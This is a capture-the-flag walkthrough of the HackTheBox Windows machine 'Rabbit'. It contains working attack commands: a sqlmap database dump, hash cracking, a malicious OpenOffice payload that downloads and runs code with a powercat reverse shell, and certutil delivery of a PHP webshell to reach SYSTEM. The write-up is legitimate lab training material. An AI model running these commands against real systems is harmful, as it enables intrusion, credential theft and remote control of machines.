In this post we will resolve the machine Rabbit from HackTheBox, acaban de retirarla y no hay mejor momento para enseñaros cómo la resolví.
It’s a high-level Windows box that is one of my favorites
My nick in HackTheBox is: manulqwerty
If you have any proposal or correction do not hesitate to leave a comment.
As always, the first thing will be a port scan with Nmap:
nmap -sC -sV
Let’s enumerate the web servers with Gobuster:
After reviewing the pages discovered and fall into several rabbit holes, we found a Complain Management System
We will use Searchsploit to fetch vulnerabilities from complain Management System:
As we read, the first thing will be to register as ‘ Customer ‘ and with the cookie PHPSESSID + sqlmap get access to the databases.
sqlmap -u '' --cookie='PHPSESSID= ' -D secret -T users --dump
We crack the obtained hashes with John:
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Where do we use these obtained credentials now? Let’s try in
After several tests we find valid credentials:
Once we have entered to the /owa the first thing will be to check the mails:
Tal y como leemos en estos mails, podríamos usar un Open Office malicioso para obtener shell pero teniendo en cuenta la restricción de PowerShell y que el Defender está activado.
As we read in these emails, we could use a malicious Open Office to get shell but considering the PowerShell constraint and the Windows Defender
In metasploit there’s an exploit that could work:
We rename the file obtained to zip and edit the file replacing the payload by:
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('');powercat -c -p 1234 -e cmd
Because of the PowerShell constraint we must use the -version 2 option:
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('');powercat -c -p 1234 -e cmd
We see that the Web service of port 8080 is served by Wamp64. Sometimes this service is run as system.
Let’s see if we have write permissions and who’s running it:
Let’s upload a php webshell:
echo '<php echo system($_GET["cmd"]);?>' > cmd.php
certutil -urlcache -split -f c:\wamp64\www\cmd.php
Now we can read the flag and even get shell as System easily.
Excellent post!! I read your blog quite often and you have some great content!!
I shared this post on facebook and Twitter as well!!
Scott from